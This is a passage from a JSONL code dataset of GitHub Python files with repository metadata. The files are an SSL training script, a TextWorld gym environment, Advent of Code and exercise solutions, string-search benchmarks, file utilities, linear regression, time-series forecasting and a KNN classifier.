learning_rate=params['learning_rate'],\n batch_size=params['batch_size'],\n num_negatives=params['num_negatives'],\n )\n \n datamodule = datamodules.DecalsDataModule(params)\n\n # Log various attributes during training\n tb_logger = pl_loggers.TensorBoardLogger(\n save_dir=params['output_dir'],\n name=file_output_head,\n )\n\n checkpoint_callback = pl.callbacks.ModelCheckpoint(\n dirpath=params['output_dir'],\n filename=file_output_head+'_{epoch:03d}',\n #monitor='train_acc1',\n #mode='max',\n every_n_epochs=params['checkpoint_every_n_epochs'],\n save_top_k=-1,\n save_on_train_epoch_end=True,\n verbose=True,\n save_last=True,\n )\n\n lr_monitor = pl.callbacks.LearningRateMonitor(\n logging_interval='epoch',\n )\n\n if params['strategy'] == 'ddp':\n # DDP set by just Trainer(strategy='ddp') will complain about spending time finding unused parameters\n # Given the model should not have any unused parameters set it explicitly with DDPPlugin\n strategy = DDPPlugin(find_unused_parameters=False)\n else:\n strategy = params['strategy']\n\n trainer = pl.Trainer.from_argparse_args(\n args,\n strategy=strategy,\n callbacks=[checkpoint_callback, lr_monitor],\n logger=tb_logger,\n )\n\n logger.info(\"Training Model\")\n # Fit model\n trainer.fit(\n model,\n datamodule=datamodule,\n ckpt_path=params['ckpt_path']\n )\n\nif __name__=='__main__':\n\n args = parse_arguments()\n \n main(args)\n","repo_name":"georgestein/ssl-legacysurvey","sub_path":"scripts/train_ssl.py","file_name":"train_ssl.py","file_ext":"py","file_size_in_byte":9447,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"21"} +{"seq_id":"26158528710","text":"import sys\nimport textwrap\nfrom io import StringIO\nfrom typing import List, Optional, Dict, Any, Tuple, Union\n\nimport numpy as np\nimport gym\nfrom gym.utils import colorize\nfrom gym.spaces import Space\n\nfrom textworld import EnvInfos\nfrom textworld.envs.wrappers import Filter, GenericEnvironment, Limit\nfrom textworld.envs.batch import AsyncBatchEnv, SyncBatchEnv\n\nfrom textworld.gym.envs.utils import shuffled_cycle\n\nfrom functools import partial\n\n\ndef _make_env(request_infos, max_episode_steps=None):\n env = GenericEnvironment(request_infos)\n if max_episode_steps:\n env = Limit(env, max_episode_steps=max_episode_steps)\n\n env = Filter(env)\n return env\n\n\nclass TextworldBatchGymEnv(gym.Env):\n metadata = {'render.modes': ['human', 'ansi', 'text']}\n\n def __init__(self,\n gamefiles: List[str],\n request_infos: Optional[EnvInfos] = None,\n batch_size: int = 1,\n asynchronous: bool = True,\n auto_reset: bool = False,\n max_episode_steps: Optional[int] = None,\n action_space: Optional[gym.Space] = None,\n observation_space: Optional[gym.Space] = None) -> None:\n \"\"\" Environment for playing text-based games in batch.\n\n Arguments:\n gamefiles:\n Paths of every game composing the pool (`*.ulx|*.z[1-8]|*.json`).\n request_infos:\n For customizing the information returned by this environment\n (see\n :py:class:`textworld.EnvInfos `\n for the list of available information).\n\n .. warning:: Only supported for TextWorld games (i.e., that have a corresponding `*.json` file).\n batch_size:\n If provided, it indicates the number of games to play at the same time.\n By default, a single game is played at once.\n\n .. warning:: When `batch_size` is provided (even for batch_size=1), `env.step` expects\n a list of commands as input and outputs a list of states. `env.reset` also\n outputs a list of states.\n asynchronous:\n If `True`, wraps the environments in an `AsyncBatchEnv` (which uses\n `multiprocessing` to run the environments in parallel). If `False`,\n wraps the environments in a `SyncBatchEnv`. Default: `True`.\n auto_reset:\n If `True`, each game *independently* resets once it is done (i.e., reset happens\n on the next `env.step` call).\n Otherwise, once a game is done, subsequent calls to `env.step` won't have any effects.\n max_episode_steps:\n Number of steps allocated to play each game. Once exhausted, the game is done.\n action_space:\n The action space be used with OpenAI baselines.\n (see :py:class:`textworld.gym.spaces.Word `).\n observation_space:\n The observation space be used with OpenAI baselines\n (see :py:class:`textworld.gym.spaces.Word `).\n \"\"\"\n self.gamefiles = gamefiles\n self.batch_size = batch_size\n self.request_infos = request_infos or EnvInfos()\n self.seed(1234)\n\n env_fns = [partial(_make_env, self.request_infos, max_episode_steps) for _ in range(self.batch_size)]\n BatchEnvType = AsyncBatchEnv if self.batch_size > 1 and asynchronous else SyncBatchEnv\n self.batch_env = BatchEnvType(env_fns, auto_reset)\n\n self.action_space = action_space or Space()\n self.observation_space = observation_space or Space()\n\n def seed(self, seed: Optional[int] = None) -> List[int]:\n \"\"\" Set the seed for this environment's random generator(s).\n\n This environment use a random generator to shuffle the order in which\n the games are played.\n\n Arguments:\n seed: Number that will be used to seed the random generators.\n\n Returns:\n All the seeds used to set this environment's random generator(s).\n \"\"\"\n # We shuffle the order in which the game will be seen.\n rng = np.random.RandomState(seed)\n gamefiles = list(self.gamefiles) # Soft copy to avoid shuffling original list.\n rng.shuffle(gamefiles)\n\n # Prepare iterator used for looping through the games.\n self._gamefiles_iterator = shuffled_cycle(gamefiles, rng=rng)\n return [seed]\n\n def reset(self) -> Tuple[List[str], Dict[str, List[Any]]]:\n \"\"\" Resets the text-based environment.\n\n Resetting this environment means starting the next game in the pool.\n\n Returns:\n A tuple (observations, infos) where\n\n * observation: text observed in the initial state for each game in the batch;\n * infos: additional information as requested for each game in the batch.\n \"\"\"\n if self.batch_env is not None:\n self.batch_env.close()\n\n gamefiles = [next(self._gamefiles_iterator) for _ in range(self.batch_size)]\n self.batch_env.load(gamefiles)\n\n self.last_commands = [None] * self.batch_size\n self.obs, infos = self.batch_env.reset()\n return self.obs, infos\n\n def skip(self, nb_games: int = 1) -> None:\n \"\"\" Skip games.\n\n Arguments:\n nb_games: Number of games to skip.\n \"\"\"\n for _ in range(nb_games):\n next(self._gamefiles_iterator)\n\n def step(self, commands) -> Tuple[List[str], List[float], List[bool], Dict[str, List[Any]]]:\n \"\"\" Runs a command in each text-based environment of the batch.\n\n Arguments:\n commands: Text command to send to the game interpreter.\n\n Returns:\n A tuple (observations, scores, dones, infos) where\n\n * observations: text observed in the new state for each game in the batch;\n * scores: total number of points accumulated so far for each game in the batch;\n * dones: whether each game in the batch is finished or not;\n * infos: additional information as requested for each game in the batch.\n \"\"\"\n self.last_commands = commands\n self.obs, scores, dones, infos = self.batch_env.step(self.last_commands)\n return self.obs, scores, dones, infos\n\n def close(self) -> None:\n \"\"\" Close this environment. \"\"\"\n\n if self.batch_env is not None:\n self.batch_env.close()\n\n self.batch_env = None\n\n def render(self, mode: str = 'human') -> Optional[Union[StringIO, str]]:\n \"\"\" Renders the current state of each environment in the batch.\n\n Each rendering is composed of the previous text command (if there's one) and\n the text describing the current observation.\n\n Arguments:\n mode:\n Controls where and how the text is rendered. Supported modes are:\n\n * human: Display text to the current display or terminal and\n return nothing.\n * ansi: Return a `StringIO` containing a terminal-style\n text representation. The text can include newlines and ANSI\n escape sequences (e.g. for colors).\n * text: Return a string (`str`) containing the text without\n any ANSI escape sequences.\n\n Returns:\n Depending on the `mode`, this method returns either nothing, a\n string, or a `StringIO` object.\n \"\"\"\n outfile = StringIO() if mode in ['ansi', \"text\"] else sys.stdout\n\n renderings = []\n for last_command, ob in zip(self.last_commands, self.obs):\n msg = ob.rstrip() + \"\\n\"\n if last_command is not None:\n command = \"> \" + last_command\n if mode in [\"ansi\", \"human\"]:\n command = colorize(command, \"yellow\", highlight=False)\n\n msg = command + \"\\n\" + msg\n\n if mode == \"human\":\n # Wrap each paragraph at 80 characters.\n paragraphs = msg.split(\"\\n\")\n paragraphs = [\"\\n\".join(textwrap.wrap(paragraph, width=80)) for paragraph in paragraphs]\n msg = \"\\n\".join(paragraphs)\n\n renderings.append(msg)\n\n outfile.write(\"\\n-----\\n\".join(renderings) + \"\\n\")\n\n if mode == \"text\":\n outfile.seek(0)\n return outfile.read()\n\n if mode == 'ansi':\n return outfile\n","repo_name":"microsoft/TextWorld","sub_path":"textworld/gym/envs/textworld_batch.py","file_name":"textworld_batch.py","file_ext":"py","file_size_in_byte":8675,"program_lang":"python","lang":"en","doc_type":"code","stars":1102,"dataset":"github-code","pt":"21"} +{"seq_id":"26969386345","text":"from collections import defaultdict\n\nTOP = 'top'\nRIGHT = 'right'\nBOT = 'bot'\nLEFT = 'left'\n\nTOP_LEFT = (0, 0)\nTOP_RIGHT = (0, -1)\nBOT_RIGHT = (-1, -1)\nBOT_LEFT = (-1, 0)\n\nLR = (0, 1)\nRL = (0, -1)\nUB = (1, 0)\nBU = (-1, 0)\n\n\nclass ST(object):\n def __init__(self, side, start, delta):\n self.side = side\n self.start = start\n self.delta = delta\n\n\ndirs = {\n ST(TOP, TOP_LEFT, LR),\n ST(RIGHT, TOP_RIGHT, UB),\n ST(BOT, BOT_LEFT, LR),\n ST(LEFT, TOP_LEFT, UB)\n}\n\nCOMPARES = [\n ST(TOP, TOP_LEFT, LR),\n ST(TOP, TOP_RIGHT, RL),\n ST(RIGHT, TOP_RIGHT, UB),\n ST(RIGHT, BOT_RIGHT, BU),\n ST(BOT, BOT_LEFT, LR),\n ST(BOT, BOT_RIGHT, RL),\n ST(LEFT, TOP_LEFT, UB),\n ST(LEFT, BOT_LEFT, BU),\n]\n\n\ndef part1(data):\n rows = parse_data(data)\n tiles = {}\n dim = len(rows[1])\n i = 0\n while i < len(rows):\n tile = int(rows[i].split(' ')[1][:-1])\n tiles[tile] = rows[i + 1: i + 1 + dim]\n i += 2 + dim\n\n matches = defaultdict(dict)\n for t, tile in tiles.items():\n for t2, tile2 in tiles.items():\n if t == t2:\n continue\n\n for d in dirs:\n for c in COMPARES:\n m = True\n st1 = d.start\n st2 = c.start\n for i in range(dim):\n if tile[st1[0]][st1[1]] != tile2[st2[0]][st2[1]]:\n m = False\n break\n st1 = (st1[0] + d.delta[0], st1[1] + d.delta[1])\n st2 = (st2[0] + c.delta[0], st2[1] + c.delta[1])\n if m:\n matches[t][d.side] = matches[t].get(d.side, 0) + 1\n\n ret = 1\n for k, v in matches.items():\n if len(v) == 2:\n ret *= k\n return ret\n\n\ndef part2(data):\n rows = parse_data(data)\n\n\ndef parse_data(data):\n rows = data.split('\\n')\n return rows\n","repo_name":"hckhilliam/programming","sub_path":"AdventOfCode/2020/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74393843253","text":"class Move:\n winTable = [[0, 1, -1],\n [-1, 0, 1],\n [1, -1, 0]]\n\n def __init__(self, result):\n self.result = result\n\n def valueIndex(self) -> int | None:\n if self.result == 'X':\n return -1\n elif self.result == 'Y':\n return 0\n elif self.result == 'Z':\n return 1\n return None\n\n def value(self):\n if self.result == 'X':\n return 0\n elif self.result == 'Y':\n return 3\n elif self.result == 'Z':\n return 6\n return None\n\n def wins(self, otherMove) -> int | None:\n otherValue = None\n if otherMove == 'A':\n otherValue = 0\n elif otherMove == 'B':\n otherValue = 1\n elif otherMove == 'C':\n otherValue = 2\n\n return self.winTable[otherValue].index(self.valueIndex()) + 1\n\n\n def calculateScore(self, otherMove):\n return self.wins(otherMove) + self.value()\n\n\nturns = [line.rstrip('\\n') for line in open('data/data.txt')]\n\ntotal = 0\nfor turn in turns:\n enemy, you = turn.split(' ')\n yourMove = Move(you)\n total += yourMove.calculateScore(enemy)\n\nprint(total)\n","repo_name":"Keeeweee/adventOfCode-2022","sub_path":"day-02/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72360865333","text":"from tools import string_tool\nfrom src.string import boyemoore, rabinkarp, kmp\nimport time\nimport matplotlib.pyplot as plt\n\n\ndef algorithm_ana(func, slen, plen, times):\n cost_time = 0.0\n for i in range(times):\n txt = string_tool.random_str(slen=slen)\n pat = string_tool.random_str(slen=plen)\n start = time.clock()\n func(txt, pat)\n end = time.clock()\n cost_time += end - start\n \n return cost_time / times\n \n\ndef get_func_name(func):\n return str(func)[10:-19]\n \n \ndef compare_test():\n funcs = [kmp.kmp, kmp.kmp_dfa, boyemoore.boyemoore_search, rabinkarp.rabinkarp_m, rabinkarp.rabinkarp_l]\n all_times = {get_func_name(func):[] for func in funcs}\n x = list(range(10,1000, 10))\n for i in x:\n print(i)\n for func in funcs:\n cost_time = algorithm_ana(func, slen=1000, plen=i, times=10)\n all_times[get_func_name(func)].append(cost_time)\n \n plt.figure()\n for key in all_times.keys():\n plt.plot(x, all_times[key], label=key)\n \n plt.legend()\n plt.show()","repo_name":"grayondream/algorithm-forth","sub_path":"src/string/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42081243956","text":"import os\nimport sys\nimport re\nfrom pickle import NONE\nimport numpy as np\n\nimport logging\nlogging.basicConfig(stream=sys.stdout, level = logging.INFO,format = '[%(levelname)s] %(message)s')\nlogger = logging.getLogger(__name__)\n\n# Split a List Into Even Chunks of N Elements\ndef list_split(listA, n, padding_file):\n for x in range(0, len(listA), n):\n every_chunk = listA[x: n+x]\n\n if len(every_chunk) < n:\n every_chunk = every_chunk + \\\n [padding_file for y in range(n-len(every_chunk))]\n yield every_chunk\n\ndef natural_sort(l):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n return sorted(l, key=alphanum_key)\n\ndef get_fileslist_from_dir(dir):\n files_list = []\n\n if os.path.exists(dir) == False:\n logger.error('dir:{} not exist'.format(dir))\n raise RuntimeError()\n\n for f in os.listdir(dir):\n if f.endswith(\".npy\") or f.endswith(\".NPY\") or f.endswith(\".bin\") or f.endswith(\".BIN\"):\n files_list.append(os.path.join(dir, f))\n\n if len(files_list) == 0:\n logger.error('{} of input args not find valid file,valid file format:[*.npy *.NPY *.bin *.BIN]'.format(dir))\n raise RuntimeError()\n files_list.sort()\n return natural_sort(files_list)\n\ndef get_file_datasize(file_path):\n if file_path.endswith(\".NPY\") or file_path.endswith(\".npy\"):\n ndata = np.load(file_path)\n return ndata.nbytes\n else:\n return os.path.getsize(file_path)\n\ndef get_file_content(file_path):\n if file_path.endswith(\".NPY\") or file_path.endswith(\".npy\"):\n return np.load(file_path)\n else:\n with open(file_path, 'rb') as fd:\n barray = fd.read()\n return np.frombuffer(barray, dtype=np.int8)\n\ndef get_ndata_fmt(ndata):\n if ndata.dtype == np.float32 or ndata.dtype == np.float16 or ndata.dtype == np.float64:\n fmt = \"%f\"\n else:\n fmt = \"%d\"\n return fmt\n\ndef save_data_to_files(file_path, ndata):\n if file_path.endswith(\".NPY\") or file_path.endswith(\".npy\"):\n np.save(file_path, ndata)\n elif file_path.endswith(\".TXT\") or file_path.endswith(\".txt\"):\n outdata=ndata.reshape(-1, ndata.shape[-1])\n fmt = get_ndata_fmt(outdata)\n with open(file_path, 'wb') as f:\n for i in range(outdata.shape[0]):\n np.savetxt(f, np.c_[outdata[i]], fmt=fmt, newline=\" \")\n f.write(b\"\\n\")\n else:\n ndata.tofile(file_path)\n","repo_name":"Ascend/tools","sub_path":"ais-bench_workload/tool/ais_bench/ais_bench/infer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"14131533412","text":"from __future__ import annotations\nimport numpy as np\nfrom math import sqrt\n\n\nclass Metrics():\n\n @staticmethod\n def mse_(y, y_hat):\n \"\"\"\n Description:\n Calculate the MSE between the predicted output and the real output.\n Args:\n y: has to be a numpy.array, a vector of shape m * 1.\n y_hat: has to be a numpy.array, a vector of shape m * 1.\n Returns:\n mse: has to be a float.\n None if there is a matching shape problem.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n mse = (1.0 / y.shape[0]) * np.sum((y - y_hat) ** 2, axis=0)\n return float(mse)\n except:\n return None\n\n @staticmethod\n def rmse_(y, y_hat):\n \"\"\"\n Description:\n Calculate the RMSE between the predicted output and the real output.\n Args:\n y: has to be a numpy.array, a vector of shape m * 1.\n y_hat: has to be a numpy.array, a vector of shape m * 1.\n Returns:\n rmse: has to be a float.\n None if there is a matching shape problem.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n rmse = sqrt(Metrics.mse_(y, y_hat))\n return float(rmse)\n except:\n return None\n\n @staticmethod\n def mae_(y, y_hat):\n \"\"\"\n Description:\n Calculate the MAE between the predicted output and the real output.\n Args:\n y: has to be a numpy.array, a vector of shape m * 1.\n y_hat: has to be a numpy.array, a vector of shape m * 1.\n Returns:\n mae: has to be a float.\n None if there is a matching shape problem.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n mae = (1.0 / y.shape[0]) * np.sum(np.absolute(y - y_hat), axis=0)\n return float(mae)\n except:\n return None\n\n @staticmethod\n def r2score_(y, y_hat):\n \"\"\"\n Description:\n Calculate the R2score between the predicted output and the output.\n Args:\n y: has to be a numpy.array, a vector of shape m * 1.\n y_hat: has to be a numpy.array, a vector of shape m * 1.\n Returns:\n r2score: has to be a float.\n None if there is a matching shape problem.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n mean = np.mean(y, axis=0)\n residual = np.sum((y_hat - y) ** 2, axis=0)\n m_var = np.sum((y - mean) ** 2, axis=0)\n r2 = 1 - (residual / m_var)\n return float(r2)\n except:\n return None\n\n\nclass MyLinearRegression(Metrics):\n \"\"\" Homemade linear regression class to fit like a tiny boss-ish\n \"\"\"\n CLS_loss_fct = Metrics.mse_\n\n def __init__(self, thetas, alpha=1e-2, max_iter=1000):\n # Checking of the attributes:\n if (not isinstance(thetas, (np.ndarray, tuple, list))) \\\n or (not isinstance(alpha, (int, float))) \\\n or (not isinstance(max_iter, int)):\n s = \"At least one of the parameters is not of expected type.\"\n raise TypeError(s)\n\n # Testing the shape of the paramters.\n thetas = self._convert_thetas_(thetas)\n if (alpha >= 1) or (alpha <= 0) or (max_iter <= 0):\n return None\n # Casting self.theta to float, in case it is integer\n self.thetas = thetas.astype('float64')\n self.alpha = float(alpha)\n self.max_iter = max_iter\n self.thetas = thetas\n\n @staticmethod\n def _convert_thetas_(thetas):\n if isinstance(thetas, np.ndarray):\n return thetas\n return np.array(thetas).reshape(-1, 1)\n\n def _gradient_(self, x, y):\n \"\"\" Private function gradient, there is no test perform on the\n parameters. It is to avoid to perform useless same tests as each\n call of gradient in fit method.\n \"\"\"\n xp = np.hstack((np.ones((x.shape[0], 1)), x))\n return xp.T @ (xp @ self.thetas - y) / x.shape[0]\n\n def gradient(self, x, y):\n \"\"\"Computes a gradient vector from three non-empty numpy.array,\n without any for-loop. The three arrays must have compatible\n shapes.\n Args:\n x: has to be an numpy.array, a vector of shape m * 1.\n y: has to be an numpy.array, a vector of shape m * 1.\n theta: has to be an numpy.array, a 2 * 1 vector.\n Return:\n The gradient as a numpy.array, a vector of shape 2 * 1.\n None if x, y, or theta are empty numpy.array.\n None if x, y and theta do not have compatible shapes.\n None if x, y or theta is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n # Testing the type of the parameters, numpy array expected.\n if (not isinstance(x, np.ndarray)) \\\n or (not isinstance(y, np.ndarray)) \\\n or (not isinstance(self.thetas, np.ndarray)):\n return None\n\n # Testing the shape of the paramters.\n if (x.shape[1] != 1) or (y.shape[1] != 1) \\\n or (self.thetas.shape[1] != 1) \\\n or (x.shape[0] != y.shape[0]):\n return None\n grad = self._gradient_(x, y)\n\n return grad\n except:\n return None\n\n def fit_(self, x, y):\n \"\"\"\n Description:\n Fits the model to the training dataset contained in x and y.\n Args:\n x: has to be a numpy.array, a vector of shape m * 1:\n (number of training examples, 1).\n y: has to be a numpy.array, a vector of shape m * 1:\n (number of training examples, 1).\n theta: has to be a numpy.array, a vector of shape 2 * 1.\n alpha: has to be a float, the learning rate\n max_iter: has to be an int, the number of iterations done during\n the gradient descent\n Return:\n new_theta: numpy.array, a vector of shape 2 * 1.\n None if there is a matching shape problem.\n None if x, y, theta, alpha or max_iter is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n # Checking x, y and theta are numpy array\n if (not isinstance(x, np.ndarray)) \\\n or (not isinstance(y, np.ndarray)) \\\n or (not isinstance(self.thetas, np.ndarray)):\n return None\n # Checking the shape of x, y and self.theta\n if (x.shape[1] != 1) \\\n or (y.shape[1] != 1) \\\n or (x.shape[0] != y.shape[0]) \\\n or (self.thetas.shape[0] != x.shape[1] + 1):\n return None\n # Performing the gradient descent\n for _ in range(self.max_iter):\n grad = self._gradient_(x, y)\n self.thetas = self.thetas - self.alpha * grad\n except:\n # If something unexpected happened, we juste leave\n return None\n\n @staticmethod\n def loss_elem_(y, y_hat):\n \"\"\"\n Description:\n Calculates all the elements (y_pred - y)^2 of the loss function.\n Args:\n y: has to be an numpy.array, a vector.\n y_hat: has to be an numpy.array, a vector.\n Returns:\n J_elem: numpy.array, a vector of dimension\n (number of the training examples,1).\n None if there is a dimension matching problem between y and y_hat.\n None if y or y_hat is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n res = (y - y_hat) ** 2\n return res\n except:\n None\n\n @staticmethod\n def loss_(y, y_hat):\n \"\"\"Computes the half mean squared error of two non-empty numpy.array,\n without any for loop. The two arrays must have the same dimensions.\n Args:\n y: has to be an numpy.array, a vector.\n y_hat: has to be an numpy.array, a vector.\n Returns:\n The half mean squared error of the two vectors as a float.\n None if y or y_hat are empty numpy.array.\n None if y and y_hat does not share the same dimensions.\n None if y or y_hat is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n loss = MyLinearRegression.CLS_loss_fct(y, y_hat)\n # loss = (y - y_hat).T @ (y - y_hat) / (2.0 * y.shape[0])\n return float(loss) / 2.0\n except:\n None\n\n def predict_(self, x):\n \"\"\"Computes the vector of prediction y_hat from two non-empty\n numpy.array.\n Args:\n x: has to be an numpy.array, a vector of shape m * 1.\n theta: has to be an numpy.array, a vector of shape 2 * 1.\n Returns:\n y_hat as a numpy.array, a vector of shape m * 1.\n None if x or theta are empty numpy.array.\n None if x or theta shapes are not appropriate.\n None if x or theta is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n if not isinstance(x, (np.ndarray)):\n return None\n if x.ndim == 1:\n x = x.reshape(-1, 1)\n if any([n == 0 for n in x.shape]):\n return None\n if self.thetas.shape != (x.shape[1] + 1, 1):\n return None\n xp = np.hstack((np.ones((x.shape[0], 1)), x))\n ypred = xp @ self.thetas\n return ypred\n except:\n return None\n","repo_name":"madvid/ml_module_01","sub_path":"ex03/my_linear_regression.py","file_name":"my_linear_regression.py","file_ext":"py","file_size_in_byte":9927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70445545973","text":"\"\"\"Task4\r\n\r\nScript allowing to calculate and save to file\r\na table with the average MAE calculated for\r\nTimeSeriesSplit which allow to quantify model fitness\r\n\"\"\"\r\nimport warnings\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import TimeSeriesSplit\r\nfrom utils import parse_args, load_data\r\nfrom statsmodels.tsa.ar_model import AutoReg\r\nfrom statsmodels.tsa.arima.model import ARIMA\r\nfrom statsmodels.tsa.api import VAR\r\nfrom sklearn.metrics import mean_absolute_error\r\n\r\n\r\ndef main():\r\n \"\"\"Call all of the functions\"\"\"\r\n _, data = load_data()\r\n args = parse_args()\r\n make_table(data, [\"Ukraine\", \"Poland\"], save=args.display)\r\n\r\n\r\ndef make_table(data: pd.DataFrame, countries: list, save: bool):\r\n \"\"\"Function used to calculate MAE for 3 models and 2 countries\r\n\r\n :param data: Temperature data\r\n :type data: pd.DataFrame\r\n :param countries: List of countries for which\r\n the MAE should be calculated\r\n :type countries: list\r\n :param save: Whether to save or display the table\r\n :type save: bool\r\n \"\"\"\r\n # Get the country data\r\n country1_data = data[data.Country == countries[0]].reset_index()\r\n country2_data = data[data.Country == countries[1]].reset_index()\r\n\r\n # Create the split\r\n tscv = TimeSeriesSplit(n_splits=10)\r\n MAE_list = [[] for i in range(6)]\r\n\r\n for train_index, test_index in tscv.split(country1_data):\r\n y_train_1, y_test_1 = (\r\n country1_data.AverageTemperatureCelsius[train_index],\r\n country1_data.AverageTemperatureCelsius[test_index],\r\n )\r\n y_train_2, y_test_2 = (\r\n country2_data.AverageTemperatureCelsius[train_index],\r\n country2_data.AverageTemperatureCelsius[test_index],\r\n )\r\n years_train, _ = country1_data.year[train_index], country1_data.year[test_index]\r\n\r\n # Create the lists of used models\r\n models_1 = [\r\n AutoReg(y_train_1, lags=10),\r\n ARIMA(y_train_1, order=(0, 2, 3)),\r\n VAR(pd.concat([y_train_1, years_train], axis=1)),\r\n ]\r\n models_2 = [\r\n AutoReg(y_train_2, lags=10),\r\n ARIMA(y_train_2, order=(0, 2, 3)),\r\n VAR(pd.concat([y_train_2, years_train], axis=1)),\r\n ]\r\n\r\n # Calculate MAE for each model and each split\r\n for index, model in enumerate(models_1):\r\n if index < 2:\r\n model_fitted = model.fit()\r\n predicted = model_fitted.predict(test_index[0], test_index[-1])\r\n else:\r\n model_fitted = model.fit(4)\r\n predicted = model_fitted.forecast(\r\n model_fitted.endog, steps=len(y_test_1)\r\n )[:, 0]\r\n MAE = mean_absolute_error(y_test_1, predicted)\r\n MAE_list[index].append(MAE)\r\n\r\n for index, model in enumerate(models_2):\r\n if index < 2:\r\n model_fitted = model.fit()\r\n predicted = model_fitted.predict(test_index[0], test_index[-1])\r\n else:\r\n model_fitted = model.fit(4)\r\n predicted = model_fitted.forecast(\r\n model_fitted.endog, steps=len(y_test_2)\r\n )[:, 0]\r\n MAE = mean_absolute_error(y_test_2, predicted)\r\n MAE_list[index + 3].append(MAE)\r\n\r\n # Calculate the MAE mean and show it as a table\r\n MAE_mean = [np.mean(i) for i in MAE_list]\r\n MAE_tab = np.array(MAE_mean).reshape(2, 3)\r\n MAE_tab = pd.DataFrame(\r\n MAE_tab, columns=[\"AR\", \"ARIMA\", \"VAR\"], index=[countries[0], countries[1]]\r\n )\r\n\r\n # Save or display the table\r\n if save:\r\n print(\"Saving table to data folder\")\r\n MAE_tab.to_csv(\"../data/task4_table.csv\")\r\n else:\r\n print(MAE_tab)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"zofiakk/DAV","sub_path":"lab9/scripts/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29940698386","text":"'''\r\nQuestion:\r\nComplete the square sum function so that it squares each \r\nnumber passed into it and then sums the results together.\r\n\r\nFor example, for [1, 2, 2] it should return 9 \r\nbecause 1^2 + 2^2 + 2^2 = 9.\r\n\r\nAuthor : Carlos Raniel Arro\r\n\r\n'''\r\n\r\n# numbers to be pass\r\n\r\nnum = [1, 2, 2]\r\nsum = 0\r\n\r\n\r\ndef CompleteSquareSum():\r\n x = 0\r\n for i in num:\r\n y = i ** 2\r\n x += y\r\n i += 1\r\n print(x)\r\n\r\n\r\nCompleteSquareSum()\r\n","repo_name":"CarlosArro2001/CodeWarsProblems","sub_path":"squareNsum.py","file_name":"squareNsum.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75245713333","text":"import numpy as np\nimport math\nfrom sklearn.metrics import precision_score,recall_score,f1_score\n\nclass KNN():\n def __init__(self,n_neighbours=5, representatives=False, project=False):\n self.n_neighbours = n_neighbours\n self.representatives = representatives\n self.project = project\n pass\n\n def fit(self, X_train, Y_train):\n if self.representatives:\n self.X_train, self.Y_train = create_representatives(X_train,Y_train)\n else:\n self.X_train = X_train\n self.Y_train = Y_train\n if self.project:\n self.project = True\n self.X_train = self.project_datapoints(X_train)\n \n @staticmethod\n def project_datapoints(X):\n return np.mean(X,axis=2)\n\n def predict_datapoint(self, datapoint):\n class_distances = np.empty((0, 2)) # class labels and distances to the datapoint to other datapoints in X_train\n for x, y in zip(self.X_train, self.Y_train):\n dist = self.distance(datapoint, x)\n class_distances = np.append(class_distances, np.array([[y, dist]]), axis=0)\n \n class_distances = class_distances[class_distances[:, 1].argsort()]\n n_classes = class_distances[:self.n_neighbours, 0]\n\n _, counts = np.unique(n_classes, return_counts=True) # find the most common class\n ind = np.argmax(counts)\n return int(n_classes[ind])\n \n def predict_datapoint_for_n_in_range(self, datapoint, n_range):\n class_distances = np.empty((0, 2)) # class labels and distances to the datapoint to other datapoints in X_train\n for x, y in zip(self.X_train, self.Y_train):\n dist = self.distance(datapoint, x)\n class_distances = np.append(class_distances, np.array([[y, dist]]), axis=0)\n \n class_distances = class_distances[class_distances[:, 1].argsort()]\n predictions = np.empty((n_range),dtype=int)\n for i in range(n_range):\n n_classes = class_distances[:i+1, 0]\n _, counts = np.unique(n_classes, return_counts=True) # find the most common class\n ind = np.argmax(counts)\n predictions[i]=int(n_classes[ind])\n return predictions\n\n @staticmethod\n def distance(datapoint1, datapoint2): # euclidian distance\n flattened1 = np.ravel(datapoint1)\n flattened2 = np.ravel(datapoint2)\n return np.linalg.norm(flattened1 - flattened2)\n \n def predict(self,X):\n predicted = np.empty(len(X),dtype=int)\n for i in range(len(X)):\n predicted[i]=self.predict_datapoint(X[i])\n return predicted\n \n def predict_for_n_in_range(self,X,n_range): #\n predicted = np.empty([len(X),n_range],dtype=int)\n for i in range(len(X)):\n predicted[i]=self.predict_datapoint_for_n_in_range(X[i],n_range)\n return predicted\n \n def score(self,X,y):\n if self.project:\n X = self.project_datapoints(X)\n correct = 0\n # number of classes\n confusion_matrix = np.zeros([10,10],dtype=int)\n metrics= np.zeros((3),dtype=float)\n #accuracy\n predicted_lables = self.predict(X)\n 